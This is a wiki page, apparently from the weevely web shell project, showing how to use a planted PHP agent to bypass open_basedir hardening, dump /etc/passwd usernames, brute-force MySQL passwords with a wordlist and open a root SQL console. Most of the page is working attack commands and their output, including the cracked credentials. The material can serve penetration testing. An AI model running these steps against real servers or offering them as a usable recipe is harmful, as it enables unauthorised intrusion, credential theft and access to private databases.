-
Notifications
You must be signed in to change notification settings - Fork 607
Bruteforce SQL credentials
epinna edited this page Sep 20, 2014
·
1 revision
This example shows how to bruteforce credentials of multiple SQL users.
-
Example PHP configuration:
disable_functions = system, proc_open, popen, passthru, shell_exec, exec, python_eval, perl_system
andopen_basedir = /var/www/html/
-
Used modules:
audit_etcpasswd
,bruteforce_sql
, andsql_console
Gather as more as system usernames we can. Even if the open_basedir
hardening does not allow any access outside the web folder and we can't execute system commands, we can still enumerate the system users using module audit_etcpasswd
.
$ ./weevely.py http://target/agent.php mypassword
[+] weevely 3.0
[+] Target: target
[+] Session: _weevely/sessions/target/agent_1.session
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
www-data@target:/var/www/html PHP> cd ..
[-][cd] Failed cd '..': no such directory or permission denied
www-data@target:/var/www/html PHP> cat /etc/passwd
[-][download] File download failed, please check remote path and permissions
www-data@target:/var/www/html PHP> :audit_etcpasswd -real
root:x:0:0:root:/root:/bin/bash
roblast:x:1000:1000:roblast,,,:/home/roblast:/bin/bash
micjanost:x:1001:1001:micjanost,,,:/home/micjanost:/bin/bash
pjgomes:x:1002:1002:pjgomes,,,:/home/pjgomes:/bin/bash
pdpeers:x:1003:1003:pdpeers,,,:/home/pdpeers:/bin/bash
www-data@target:/var/www/html PHP>
We got 5 usernames which we can try to bruteforce to find the SQL password. Launch the SQL bruteforce module using as password wordlist the local file wordlists/huge.txt
.
www-data@target:/var/www/html PHP> :bruteforce_sql
error: too few arguments
usage: bruteforce_sql [-h] [-hostname HOSTNAME] [-users [USERS [USERS ...]]]
[-pwds [PWDS [PWDS ...]]] [-fusers FUSERS]
[-fpwds FPWDS]
{mysql,pgsql}
Bruteforce SQL database
positional arguments:
{mysql,pgsql} Service to bruteforce
optional arguments:
-h, --help show this help message and exit
-hostname HOSTNAME Hostname
-users [USERS [USERS ...]]
Users
-pwds [PWDS [PWDS ...]]
Passwords
-fusers FUSERS Local file path containing users list
-fpwds FPWDS Local file path containing password list
www-data@target:/var/www/html PHP> :bruteforce_sql mysql -users roblast micjanost pjgomes pdpeers root -fpwds wordlists/huge.txt
roblast:reckoned
pjgomes:national
root:Gilchrist
www-data@target:/var/www/html PHP>
In few seconds we got 3 out of 5 credentials. Use sql_console
to check the found accounts.
www-data@target:/var/www/html PHP> :sql_console -u root -p Gilchrist
root@localhost SQL> show databases;
+--------------------+
| mysql |
| performance_schema |
| test |
| appdb |
+--------------------+
root@localhost SQL>
:)